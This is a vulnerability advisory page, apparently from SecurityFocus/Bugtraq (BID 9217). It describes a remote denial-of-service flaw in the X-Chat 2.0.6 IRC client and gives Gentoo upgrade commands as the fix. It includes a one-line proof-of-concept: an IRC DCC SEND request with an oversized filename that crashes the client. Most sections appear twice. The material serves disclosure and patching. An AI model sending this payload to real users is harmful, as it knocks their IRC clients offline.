X-Chat Remote Denial of Service Vulnerability
BID:9217
Info
X-Chat Remote Denial of Service Vulnerability
| Bugtraq ID: | 9217 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 15 2003 12:00AM |
| Updated: | Dec 15 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to Stefan Hecker <[email protected]>. |
| Vulnerable: |
X-Chat X-Chat 2.0.6 |
| Not Vulnerable: | |
Discussion
X-Chat Remote Denial of Service Vulnerability
It has been reported that X-Chat may be prone to a remote denial of service vulnerability that may allow an attacker to crash the client by sending a malicious 'DDC SEND' request.
X-Chat version 2.0.6 running on a Linux platform has been reported to be affected by this issue resulting in a crash. Although unconfirmed, it is possible that other versions are affected as well. This issue is similar to mIRC DCC SEND Buffer Overflow Vulnerability (BID 8818).
It has been reported that X-Chat may be prone to a remote denial of service vulnerability that may allow an attacker to crash the client by sending a malicious 'DDC SEND' request.
X-Chat version 2.0.6 running on a Linux platform has been reported to be affected by this issue resulting in a crash. Although unconfirmed, it is possible that other versions are affected as well. This issue is similar to mIRC DCC SEND Buffer Overflow Vulnerability (BID 8818).
Exploit / POC
X-Chat Remote Denial of Service Vulnerability
The following proof of concept has been supplied:
/quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a" 1363975063 3500 4^A
The following exploit has been available for mIRC DCC SEND Buffer Overflow Vulnerability (BID 8818) and reported to affect this issue as well:
The following proof of concept has been supplied:
/quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a" 1363975063 3500 4^A
The following exploit has been available for mIRC DCC SEND Buffer Overflow Vulnerability (BID 8818) and reported to affect this issue as well:
Solution / Fix
X-Chat Remote Denial of Service Vulnerability
Solution:
Gentoo has released an advisory 200312-06 with fixes to address this issue. Please see the referenced advisory for more informaiton. Users may apply the fixes by carrying out the following commands:
emerge sync
emerge -pv '>=net-irc/xchat-2.0.6-r1'
emerge '>=net-irc/xchat-2.0.6-r1'
emerge clean
Solution:
Gentoo has released an advisory 200312-06 with fixes to address this issue. Please see the referenced advisory for more informaiton. Users may apply the fixes by carrying out the following commands:
emerge sync
emerge -pv '>=net-irc/xchat-2.0.6-r1'
emerge '>=net-irc/xchat-2.0.6-r1'
emerge clean